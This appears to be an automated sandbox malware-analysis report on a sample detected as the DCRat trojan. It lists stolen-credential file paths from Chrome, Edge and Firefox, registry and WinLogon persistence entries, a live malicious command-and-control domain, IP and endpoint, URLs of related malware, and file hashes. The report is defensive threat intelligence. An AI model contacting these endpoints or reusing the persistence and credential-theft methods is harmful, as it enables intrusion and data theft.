Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal

Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.2374859245.0000000012E9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 9XHFe6y4Dj.exe PID: 6400, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 9XHFe6y4Dj.exe PID: 8812, type: MEMORYSTR
Source: Yara match | File source: 9XHFe6y4Dj.exe, type: SAMPLE
Source: Yara match | File source: 0.0.9XHFe6y4Dj.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2087739498.0000000000682000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, type: DROPPED

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 1 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | 1 Taint Shared Content | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 144 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Obfuscated Files or Information | Security Account Manager | 341 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 31 Registry Run Keys / Startup Folder | 31 Registry Run Keys / Startup Folder | 1 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 261 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 133 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 261 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

[Behavior graph. ID: 1538177, Sample: 9XHFe6y4Dj.exe, Startdate: 20/10/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 9XHFe6y4Dj.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| 9XHFe6y4Dj.exe | 100% | Avira | HEUR/AGEN.1339906 | |
| 9XHFe6y4Dj.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe | 100% | Avira | HEUR/AGEN.1339906 | |
| C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe | 100% | Joe Sandbox ML | | |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML | | |
| C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\AKEAUBbV.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\BQsBwRkl.log | 17% | ReversingLabs | | |
| C:\Users\user\Desktop\FcMrvptI.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic | |
| C:\Users\user\Desktop\GrAQXWWY.log | 17% | ReversingLabs | | |
| C:\Users\user\Desktop\GzkiCFwe.log | 29% | ReversingLabs | | |
| C:\Users\user\Desktop\HobYtWlT.log | 13% | ReversingLabs | ByteCode-MSIL.Trojan.Generic | |
| C:\Users\user\Desktop\HyVANeDN.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\JTIguxNU.log | 17% | ReversingLabs | | |
| C:\Users\user\Desktop\JVSqkWFI.log | 12% | ReversingLabs | | |
| C:\Users\user\Desktop\LeSOATlM.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\LmCheCMS.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\MlnyqaSB.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic | |
| C:\Users\user\Desktop\OXbzuEDs.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate | |
| C:\Users\user\Desktop\OoZhLKXw.log | 21% | ReversingLabs | | |
| C:\Users\user\Desktop\PNvPNCKx.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\QZUgHzbG.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic | |
| C:\Users\user\Desktop\RORqBBDl.log | 21% | ReversingLabs | | |
| C:\Users\user\Desktop\ScGOdifB.log | 12% | ReversingLabs | | |
| C:\Users\user\Desktop\TQKWOvbz.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\VNlekvqu.log | 21% | ReversingLabs | | |
| C:\Users\user\Desktop\XPYNFevp.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate | |
| C:\Users\user\Desktop\XjppJZgg.log | 13% | ReversingLabs | ByteCode-MSIL.Trojan.Generic | |
| C:\Users\user\Desktop\ZInvrbgn.log | 21% | ReversingLabs | | |
| C:\Users\user\Desktop\aZffRVgZ.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic | |
| C:\Users\user\Desktop\bIYNCAnX.log | 17% | ReversingLabs | | |
| C:\Users\user\Desktop\cmFWEbPY.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\fXkmLoaR.log | 29% | ReversingLabs | | |
| C:\Users\user\Desktop\ftgCpYKW.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\ioFvQtnJ.log | 9% | ReversingLabs | | |
| C:\Users\user\Desktop\jrGLbElV.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\koiTwEAQ.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic | |
| C:\Users\user\Desktop\mcmciRwO.log | 12% | ReversingLabs | | |
| C:\Users\user\Desktop\oXLUJmZB.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\ohiUtZsx.log | 21% | ReversingLabs | | |
| C:\Users\user\Desktop\pSWUxCdp.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\pkjlEjqK.log | 5% | ReversingLabs | | |
| C:\Users\user\Desktop\qhLtZjFE.log | 21% | ReversingLabs | | |
| C:\Users\user\Desktop\taabLgrD.log | 9% | ReversingLabs | | |
| C:\Users\user\Desktop\vWmBrFMh.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\vcMKgPvy.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\wQQSSdrw.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\xYZkNoRc.log | 12% | ReversingLabs | | |
| C:\Users\user\Desktop\yHSRySXa.log | 5% | ReversingLabs | | |
| C:\Users\user\Desktop\zKTiJdVm.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic | |
| C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |

                            No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe | |
| https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe | |
| https://g.live.com/odclientsettings/Prod/C: | 0% | URL Reputation | safe | |
| https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe | |
| http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe | |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe | |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe | |
| https://g.live.com/odclientsettings/ProdV2.C: | 0% | URL Reputation | safe | |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe | |
| https://aka.ms/pscore68 | 0% | URL Reputation | safe | |
| https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
| https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe | |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| 733812cm.n9shteam.in | 188.114.96.3 | true | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://733812cm.n9shteam.in/DefaultWordpress.php | true | | unknown |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://ac.ecosia.org/autocomplete?q= | CpvYgJX57w.71.dr | false | URL Reputation: safe | unknown |
| https://duckduckgo.com/chrome_newtab | CpvYgJX57w.71.dr | false | URL Reputation: safe | unknown |
| https://g.live.com/odclientsettings/Prod/C: | svchost.exe, 0000004C.00000003.2526789075.0000021257EB3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.76.dr | false | URL Reputation: safe | unknown |
| https://duckduckgo.com/ac/?q= | CpvYgJX57w.71.dr | false | URL Reputation: safe | unknown |
| https://www.google.com/images/branding/product/ico/googleg_lodp.ico | CpvYgJX57w.71.dr | false | | unknown |
| http://pesterbdd.com/images/Pester.png | powershell.exe, 0000003A.00000002.2532930732.000001B900228000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe | false | URL Reputation: safe | unknown |
| http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000003A.00000002.2532930732.000001B900228000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | CpvYgJX57w.71.dr | false | URL Reputation: safe | unknown |
| http://schemas.xmlsoap.org/wsdl/ | powershell.exe | false | URL Reputation: safe | unknown |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | CpvYgJX57w.71.dr | false | URL Reputation: safe | unknown |
| https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 0000004C.00000003.2526789075.0000021257E40000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.76.dr | false | URL Reputation: safe | unknown |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | CpvYgJX57w.71.dr | false | URL Reputation: safe | unknown |

                                    https://aka.ms/pscore68powershell.exe, 0000001C.00000002.2703365536.0000015703F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2497719387.0000026F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2638394745.000002C7347B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2631300752.0000018E4E331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2616194889.000001F2023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2509066304.00000217408F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2616044950.0000019063E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2632781109.000002D29E0A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2535836982.000002579CD21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2626345528.0000012CC0761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2522252537.000001FC00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2557930328.0000012000181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2601962440.000002223C871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2573932812.000001C784141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2712814491.0000011152551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2643318027.000001D331A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2590359889.000001FF24B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2532930732.000001B900001000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.ecosia.org/newtab/CpvYgJX57w.71.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name9XHFe6y4Dj.exe, 00000000.00000002.2210751988.000000000351C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2703365536.0000015703F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2497719387.0000026F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2638394745.000002C7347B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2631300752.0000018E4E331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2616194889.000001F2023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2509066304.00000217408F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2616044950.0000019063E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2632781109.000002D29E0A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2535836982.000002579CD21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2626345528.0000012CC0761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2522252537.000001FC00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2557930328.0000012000181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2601962440.000002223C871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2573932812.000001C784141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2712814491.0000011152551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2643318027.000001D331A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2590359889.000001FF24B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
0000003A.00000002.2532930732.000001B900001000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=CpvYgJX57w.71.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 0000003A.00000002.2532930732.000001B900228000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      IP | Domain | Country | ASN | ASN Name | Malicious
                                      188.114.96.3 | 733812cm.n9shteam.in | European Union | 13335 | CLOUDFLARENETUS | true
                                      IP
                                      127.0.0.1
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1538177
                                      Start date and time:2024-10-20 18:16:15 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 12m 17s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:80
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:9XHFe6y4Dj.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:8213A9C837181823A4D58728637EAEB5.exe
                                      Detection:MAL
                                      Classification:mal100.spre.troj.spyw.expl.evad.winEXE@86/167@1/2
                                      EGA Information:Failed
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, schtasks.exe
                                      • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target 9XHFe6y4Dj.exe, PID 3372 because it is empty
                                      • Execution Graph export aborted for target 9XHFe6y4Dj.exe, PID 5160 because it is empty
                                      • Execution Graph export aborted for target 9XHFe6y4Dj.exe, PID 6400 because it is empty
                                      • Execution Graph export aborted for target 9XHFe6y4Dj.exe, PID 8812 because it is empty
                                      • Execution Graph export aborted for target tqeRXJHxPWPPoiNqjJeEYdv.exe, PID 7484 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: 9XHFe6y4Dj.exe
                                      Time | Type | Description
                                      12:17:27 | API Interceptor | 398x Sleep call for process: powershell.exe modified
                                      12:17:54 | API Interceptor | 2174951x Sleep call for process: tqeRXJHxPWPPoiNqjJeEYdv.exe modified
                                      12:17:56 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                      18:17:20 | Task Scheduler | Run new task: tqeRXJHxPWPPoiNqjJeEYdv path: "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:17:20 | Task Scheduler | Run new task: tqeRXJHxPWPPoiNqjJeEYdvt path: "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:17:22 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdv "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:17:23 | Task Scheduler | Run new task: 9XHFe6y4Dj path: "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                      18:17:24 | Task Scheduler | Run new task: 9XHFe6y4Dj9 path: "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                      18:17:35 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9XHFe6y4Dj "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                      18:17:49 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdv "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:17:59 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9XHFe6y4Dj "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                      18:18:08 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdv "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:18:17 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run 9XHFe6y4Dj "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                      18:18:34 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:18:43 | Autostart | Run: WinLogon Shell "C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:18:52 | Autostart | Run: WinLogon Shell "C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:19:01 | Autostart | Run: WinLogon Shell "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:19:10 | Autostart | Run: WinLogon Shell "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                      Match: 188.114.96.3
                                      Associated Sample Name / URL | Detection | Threat Name | Context
                                      SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe | malicious | Unknown | servicetelemetryserver.shop/api/index.php
                                      t1zTzS9a3r.exe | malicious | DCRat, PureLog Stealer, zgRAT | abdulbek.top/externalvideoprotectdefaultsqlWindowsdlePrivate.php
                                      aQdB62N7SB.elf | malicious | Shikitega, Xmrig | main.dsn.ovh/dns/lovely
                                      QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/DyuQ5y15/download
                                      zygWTMeQC2.exe | malicious | DCRat, PureLog Stealer, zgRAT | 138231cm.n9shteam.in/CpuApiprotectTemp.php
                                      PURCHASE ORDER-6350.exe | malicious | FormBook | www.cc101.pro/ttiz/
                                      Aunali_khokhawala-In Services.Agreement-SDYAMPA 416944.rtf | malicious | EvilProxy, Fake Captcha, HTMLPhisher | vh26kx.pinboarddisplaced.com/?email=
                                      SMX-ACH0036173.vbs | malicious | FormBook, GuLoader | www.casesrep.site/7z6q/
                                      http://sss-mmm-yyy.ru/ | malicious | Unknown | sss-mmm-yyy.ru/assets/img/emoji/1f1ff-1f1fc.png
                                      DRAFT DOC2406656.bat.exe | malicious | Lokibot | touxzw.ir/sirr/five/fre.php
                                      No context
                                      Match: CLOUDFLARENETUS
                                      Associated Sample Name / URL | Detection | Threat Name | Context
                                      WinFIG.exe | malicious | LummaC | 104.21.53.8
                                      WinFIG-2024.exe | malicious | LummaC | 104.21.53.8
                                      file.exe | malicious | LummaC | 172.67.206.204
                                      SentinelOculus.exe | malicious | LummaC | 172.67.206.204
                                      Download.exe | malicious | LummaC | 104.21.53.8
                                      Aquantia.exe | malicious | LummaC | 188.114.96.3
                                      file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.53.8
                                      file.exe | malicious | Unknown | 104.21.71.28
                                      AxoPac.exe | malicious | LummaC | 172.67.189.211
                                      gtIVRm5dHl.htm | malicious | Unknown | 104.16.230.132
                                      No context
                                      Match: C:\Users\user\Desktop\AKEAUBbV.log
                                      Associated Sample Name / URL | Detection | Threat Name
                                      12Vjq7Yv2E.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                      7WyBcig6e3.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                      kBY9lgRaca.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                      lv961v43L3.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                      RRjzYVukzs.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                      FMd6ntIhQY.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                      5Aw2cV5m0c.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                      AvQTFKdsST.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                      5WbBcHi91R.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                      ggJWCFp2S3.exe | malicious | DCRat
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):1168
                                                          Entropy (8bit):4.448520842480604
                                                          Encrypted:false
                                                          SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                          MD5:B5189FB271BE514BEC128E0D0809C04E
                                                          SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                          SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                          SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                          Malicious:false
                                                          Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.934572677073507
                                                          Encrypted:false
                                                          SSDEEP:48:6impt5xZ8RxeOAkFJOcV4MKe28dCdEokvqBHTuulB+hnqXSfbNtm:8WxvxVx98kvkFTkZzNt
                                                          MD5:52A714DFEA4A7A5CD8CD7EDB6DAFF2D3
                                                          SHA1:9188B1B4530044065E4B2D30E0F572408C9B4807
                                                          SHA-256:C73D9B9B4E81B9C67E45F8AAC10CF96EBD844BB57EA0E3064AD0266D6ECCCE28
                                                          SHA-512:24DA3D6A4D30F63CB51FFFC5BD21E9BFBF33093CCAEB2D18318F458F929DF8810CD73BE53F0BC6D60A15218F61A48729610296FDBA501EDFE0069597416328D6
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with very long lines (312), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):5.785987586142407
                                                          Encrypted:false
